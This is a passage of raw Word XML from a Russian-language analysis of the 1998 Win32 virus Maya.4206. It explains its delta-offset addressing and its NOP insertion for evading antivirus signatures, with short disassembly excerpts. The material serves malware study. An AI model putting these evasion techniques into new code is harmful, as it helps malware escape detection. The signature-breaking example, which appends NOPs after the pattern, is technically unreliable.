          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ПРИМЕРЫ ИСПОЛЬЗОВАНИЯ DELTA OFFSET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762279AE" w14:textId="0B532B0C" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Во всем коде вируса используется следующий паттерн для обращения к глобальным переменным:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB2A012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mov     eax, offset some_variable  ; Получить смещение переменной от начала секции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B3B479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add     eax, ebp                   ; Добавить delta offset для получения реального адреса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6455368F" w14:textId="4A1F48F1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mov     eax, [eax]                 ; Загрузить значение переменной</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45803765" w14:textId="12395AA1" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Или более компактная форма:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E46A4E8" w14:textId="3F5BE932" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>mov     eax, ss:some_variable[ebp] ; Прямое обращение с учетом delta offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676AE423" w14:textId="5DA13BD1" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ДОКАЗАТЕЛЬСТВО: В файле Virus.Win32.Maya.4206.lst (строки 40-54) четко видно использование delta offset техники в самом начале функции start. Анализ всего кода вируса показывает, что все обращения к глобальным переменным и строковым константам используют конструкцию `ss:variable[ebp]`, что подтверждает активное использование delta offset на протяжении всего кода вируса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A761A9A" w14:textId="4902EFFE" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc215414030"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Вставка мусорных инструкций</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="7767FD67" w14:textId="49BAD34E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NOP (No Operation) - это инструкция процессора, которая не выполняет никаких действий,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>но занимает место в памяти и требует время на выполнение. NOP-слайды - это техника</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>вставки последовательностей NOP инструкций между полезными инструкциями кода.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F9F694" w14:textId="1F494269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ЗАЧЕМ ИСПОЛЬЗУЮТСЯ NOP-СЛАЙДЫ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C333836" w14:textId="7EDBCC50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1. Изменение сигнатур: Антивирусные системы часто используют сигнатуры на основе</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>последовательностей байтов в коде. Вставка NOP инструкций изменяет эти последовательности,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>делая сигнатуры неэффективными.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B81624" w14:textId="6186929C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2. Усложнение дизассемблирования: Некоторые дизассемблеры могут неправильно интерпретировать</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>код при наличии NOP инструкций, особенно если они находятся в неожиданных местах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149BF458" w14:textId="258DB7BE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3. Выравнивание кода: В некоторых случаях NOP используются для выравнивания кода по границам,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>что может улучшить производительность на некоторых процессорах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77389645" w14:textId="00779129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4. Усложнение анализа: При ручном анализе большое количество NOP инструкций может отвлекать</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>и усложнять понимание логики кода.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32071383" w14:textId="0608816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ДЕТАЛЬНЫЙ АНАЛИЗ ПРИМЕРОВ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5484565D" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRPr="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Адрес: 0x0040119C (пример из функции FindFuncInKernel32dll)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECCFC96" w14:textId="73F21C74" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Код из lst файла:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD35E64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CODE:0040119A                 jz      short loc_4011A5         ; Условный переход, если найдена строка "KERN"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D91FFC" w14:textId="77777777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CODE:0040119C                 nop                               ; NOP-слайд 1: Первая мусорная инструкция</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ACD18D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lastRenderedPageBreak/>
        <w:t>CODE:0040119D                 nop                               ; NOP-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>слайд</w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EFE13E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CODE:0040119E                 nop                               ; NOP-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>слайд</w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA0EB41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CODE:0040119F                 nop                               ; NOP-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>слайд</w:t>
      </w:r>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654986C1" w14:textId="3E6DED63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CODE:004011A0                 add     eax, 14h                  ; Полезная инструкция: переход к следующей записи Import Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12487229" w14:textId="100303F9" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>АНАЛИЗ: В данном случае NOP инструкции вставлены между полезными инструкциями. Это изменяет последовательность байтов и может сделать сигнатуру менее эффективной.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217C6EC8" w14:textId="5EBC1084" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ДОПОЛНИТЕЛЬНЫЕ ПРИМЕРЫ NOP-СЛАЙДОВ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB1D381" w14:textId="6FD28678" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>В файле Virus.Win32.Maya.4206.lst обнаружены NOP-слайды в следующих местах:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E62A52F" w14:textId="4ACD4458" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Строки 63-66 (после проверки результата FindFuncInKernel32dll):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B6FA3B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CODE:00401036                 jz      short loc_401097</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AA7796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CODE:00401038                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABA7A47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CODE:00401039                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF1C5E5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CODE:0040103A                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C419C56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CODE:0040103B                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4171EE3C" w14:textId="3C176749" w:rsidR="00485DB5" w:rsidRPr="00C26132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CODE:0040103C                 mov     ss:GetModuleHandleA_0[ebp], eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7750DE29" w14:textId="58CF2F13" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Строки 148-151 (в цикле поиска функции по имени):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B3F2C0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CODE:0040111F                 jz      short loc_40112B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607483F8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CODE:00401121                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F7B83A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CODE:00401122                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6381ED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CODE:00401123                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067C60DB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CODE:00401124                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE24DFE" w14:textId="6C9C596B" w:rsidR="00485DB5" w:rsidRPr="00C26132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CODE:00401125                 add     eax, 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0A6C56" w14:textId="70B24DF2" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Строки 201-204 (в цикле поиска kernel32.dll):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B34F10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CODE:0040119A                 jz      short loc_4011A5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ECBC8E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CODE:0040119C                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650A5FB6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CODE:0040119D                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A06B7EF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CODE:0040119E                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECB3E77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CODE:0040119F                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC5A250" w14:textId="6628319F" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CODE:004011A0                 add     eax, 14h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7571D6" w14:textId="70DF1F41" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Строки 229-237 (при обработке импортов):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DDDE33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CODE:004011CE                 jz      short loc_40120C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA23539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CODE:004011D0                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE0BEB9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CODE:004011D1                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75019213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CODE:004011D2                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584DDF0F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CODE:004011D3                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B7B09" w14:textId="3E731B8A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CODE:004011D4                 cmp     byte ptr [ebx+3], 80h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B16948A" w14:textId="0A3A536E" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Строки 247-250 (после сравнения строк):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AB03B5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CODE:004011F1                 pop     ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB9E836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CODE:004011F2                 jz      short loc_4011FE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760E0E98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CODE:004011F4                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1452D927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CODE:004011F5                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4961716D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CODE:004011F6                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A494EA5" w14:textId="77777777" w:rsidR="00485DB5" w:rsidRPr="00485DB5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CODE:004011F7                 nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6704FD" w14:textId="295AE6EF" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CODE:004011F8 loc_4011F8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D44883" w14:textId="6544FF26" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ВЛИЯНИЕ НА СИГНАТУРЫ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7148E144" w14:textId="54EEB93B" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Предположим, что антивирус использует сигнатуру на основе следующей последовательности:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667A5B88" w14:textId="03BE6A36" w:rsidR="00485DB5" w:rsidRPr="00C26132" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>8B 0C 24 83 F9 00 74 0C                    ; mov ecx, [esp]; cmp ecx, 0; jz short loc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B46CB4" w14:textId="66032EFC" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Если между инструкциями вставлены NOP (код операции 0x90), сигнатура становится недействительной:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4519396D" w14:textId="1EDD3498" w:rsidR="00485DB5" w:rsidRDefault="00485DB5" w:rsidP="00485DB5">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485DB5">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>8B 0C 24 83 F9 00 74 0C 90 90 90 90        ; те же инструкции, но с NOP в конце</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15496EAB" w14:textId="7BCEEDEF" w:rsidR="00485DB5" w:rsidRDefault="003A6FE2" w:rsidP="003A6FE2">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Это заставляет антивирус либо использовать более гибкие сигнатуры (что увеличивает количество ложных срабатываний), либо вообще не обнаруживать вирус по этой сигнатуре.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B48C72B" w14:textId="6603E9CB" w:rsidR="00474D3B" w:rsidRDefault="00474D3B" w:rsidP="00474D3B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ЭФФЕКТИВНОСТЬ NOP-СЛАЙДОВ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720D94A9" w14:textId="77777777" w:rsidR="00474D3B" w:rsidRDefault="00474D3B" w:rsidP="00474D3B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Современные антивирусные системы используют более сложные методы обнаружения, включая:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0D01A5" w14:textId="77777777" w:rsidR="00474D3B" w:rsidRDefault="00474D3B" w:rsidP="00474D3B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>- Эвристический анализ структуры кода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2404E04C" w14:textId="77777777" w:rsidR="00474D3B" w:rsidRDefault="00474D3B" w:rsidP="00474D3B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>- Поведенческий анализ (эмуляция выполнения)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2E41F6" w14:textId="3F2D0ABB" w:rsidR="00474D3B" w:rsidRDefault="00474D3B" w:rsidP="00474D3B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>- Машинное обучение для классификации кода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0846A009" w14:textId="0FAB1676" w:rsidR="003A6FE2" w:rsidRDefault="00474D3B" w:rsidP="00474D3B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Поэтому NOP-слайды, хотя и эффективны против простых сигнатурных детекторов, не являются надежной защитой от современных систем обнаружения. Однако в 1998 году, когда был создан вирус Maya, NOP-слайды были достаточно эффективной техникой для обхода сигнатурных детекторов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104EB521" w14:textId="531862ED" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc215414031"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Скрытие от обнаружения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="2902816D" w14:textId="3893C121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Современное вредоносное программное обеспечение использует множество сложных техник</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>для скрытия от антивирусных систем, анализаторов и исследователей. Эти техники</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>включают анти</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>отладочные проверки, обнаружение и обход песочниц, скрытие сетевой</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>активности, удаление следов деятельности и многие другие.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5E08C0" w14:textId="253F3DB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Однако при анализе вируса Virus.Win32.Maya.4206 было обнаружено, что вирус</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>использует минимальные техники для скрытия от антивирусных систем. Это объясняется</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>тем, что вирус был создан в 1998 году, когда многие современные техники обхода</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>еще не были разработаны или не были широко распространены. В то время антивирусные</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>системы были менее сложными, а техники обнаружения были в основном основаны на</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>сигнатурах, а не на поведенческом анализе или эвристике.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25734B31" w14:textId="567DF102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Данное наблюдение является важным для понимания эволюции вредоносного программного</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>обеспечения. Вирус Maya представляет собой "снимок" состояния техник обхода защиты</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>на рубеже тысячелетий, что делает его ценным материалом для изучения истории</w:t>
      </w:r>
